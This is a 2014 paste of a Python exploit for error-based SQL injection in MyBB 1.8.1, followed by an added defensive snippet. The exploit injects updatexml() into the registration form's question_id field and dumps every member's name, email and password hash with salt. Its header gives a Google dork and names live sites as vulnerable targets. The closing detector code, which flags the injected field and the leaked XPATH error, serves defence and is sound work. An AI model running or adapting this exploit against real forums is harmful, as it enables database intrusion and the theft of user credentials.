MyBB 1.8.X <= 1.8.1 Error based SQL Injection

Nov 16th, 2014
```python
#!/usr/bin/env python
# Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
# Date : 2014-11-15
# Google Dork : intext:Powered By MyBB
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
# Version: 1.8.X
# Tested on: Linux / Python 2.7
# Status : Patched in MyBB 1.8.2
# Author : MakMan -- mak.man@live.com -- https://www.facebook.com/hackticlabs
# Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/ : http://gamergate.community/

import sys, re
import urllib2, urllib

print '\n\n---------------------------------------------------------------------------------'
print 'Script Coded by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
print '-----------------------MyBB 1.8.X Error based SQL Injection---------------------'
print '---------------------------------------------------------------------------------\n\n\n'
url = raw_input('Enter URL http://www.example.com/path_to_mybb :: ')
url = url.rstrip('/')
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"


def inject(sql):
    # Submits the registration form with the expression appended to question_id.
    # MySQL's updatexml() raises an XPATH syntax error that echoes the query
    # result, and MyBB 1.8.1 returned that database error in a 503 page.
    try:
        urllib2.urlopen(urllib2.Request('%s/member.php' % url, data="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" % urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" % sql), headers={"User-agent": ua}))
    except urllib2.HTTPError, e:
        data = e.read()
        if e.code == 503:
            txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
            if txt is not None:
                return txt.group(1)
            sys.exit('Error [3], received unexpected data:\n%s' % data)
        sys.exit('Not Vulnerable i guess !!!')
    # A normal (non-error) response means the error channel is not present.
    sys.exit('Not Vulnerable or check your internet connection !!')


def get(name, table, num):
    # The XPATH error message carries at most 32 characters (one is the
    # leading colon), so longer values are read in 31-character pieces.
    sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
        return inject(sqli)
    else:
        r = ''
        for i in range(1, s+1, 31):
            r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
        return r


# 0x757365727324 is the regexp 'users$', matching the prefixed members table.
members_table = inject('select table_name from information_schema.tables where table_schema=database() and table_name regexp 0x757365727324 limit 0,1')
n = inject('SELECT COUNT(*) FROM %s' % members_table)
print '----------------------------------------------------------------------------'
print '* Found %s users' % n
print '----------------------------------------------------------------------------'
for j in range(int(n)):
    print '{:20s} {:20s}'.format('Id', get('uid', members_table, j))
    print '{:20s} {:20s}'.format('Name', get('username', members_table, j))
    print '{:20s} {:20s}'.format('Email', get('email', members_table, j))
    print '{:20s} {:20s}'.format('Password : Salt', get('CONCAT(password,0x3a,salt)', members_table, j))
    print '----------------------------------------------------------------------------'
```
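From the defender's side, the script above relies on two observable things: an XML error function (updatexml) smuggled into a registration form field, and a 503 page that echoes the MySQL XPATH error. The following is an added example, not part of the paste, that triages a MyBB version string against the patched release the header names and inspects a form POST and an error page for those two markers; the request bodies and error page are constructed samples.

```python
import re
from urllib.parse import parse_qs

# MySQL functions whose XPATH errors echo their argument; the paste uses updatexml().
ERROR_BASED_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
# Same message the exploit parses: the leaked value follows the 0x3a colon.
XPATH_LEAK = re.compile(r"XPATH syntax error: ':(.*?)'")
# The paste states the bug affects 1.8.x up to 1.8.1 and is patched in 1.8.2.
PATCHED = (1, 8, 2)

def version_is_vulnerable(version):
    """True for MyBB 1.8.0 and 1.8.1, False from 1.8.2 onward ("1.8" counts as 1.8.0)."""
    parts = tuple(int(p) for p in version.split("."))
    parts = (parts + (0, 0, 0))[:3]
    return (1, 8, 0) <= parts < PATCHED

def suspicious_fields(post_body):
    """Map each form field whose decoded value calls an XML error function
    to that value; empty for an ordinary registration POST."""
    hits = {}
    for field, values in parse_qs(post_body, keep_blank_values=True).items():
        for v in values:
            if ERROR_BASED_FUNCS.search(v):
                hits[field] = v
    return hits

def leaked_via_xpath(status, body):
    """Return the value echoed in a 503 SQL-error page, or None.
    A match means a raw database error reached the client, which is the
    channel the exploit reads; MyBB should show its generic error page instead."""
    if status != 503:
        return None
    m = XPATH_LEAK.search(body)
    return m.group(1) if m else None

# Constructed samples (not captured traffic).
BENIGN_POST = ("username=alice&password=s3cret&email=alice%40example.org"
               "&question_id=17&answer=4&action=do_register")
INJECTED_POST = ("username=alice&password=s3cret&email=alice%40example.org"
                 "&question_id=17%27+and+updatexml(NULL%2Cconcat(0x3a%2C(SELECT+1))%2CNULL)+and+%271"
                 "&answer=4&action=do_register")
ERROR_PAGE = "<h1>MyBB SQL Error</h1><p>XPATH syntax error: ':1'</p>"

if __name__ == "__main__":
    print(version_is_vulnerable("1.8.1"), version_is_vulnerable("1.8.2"))
    print(suspicious_fields(BENIGN_POST), suspicious_fields(INJECTED_POST))
    print(leaked_via_xpath(503, ERROR_PAGE), leaked_via_xpath(200, ERROR_PAGE))
```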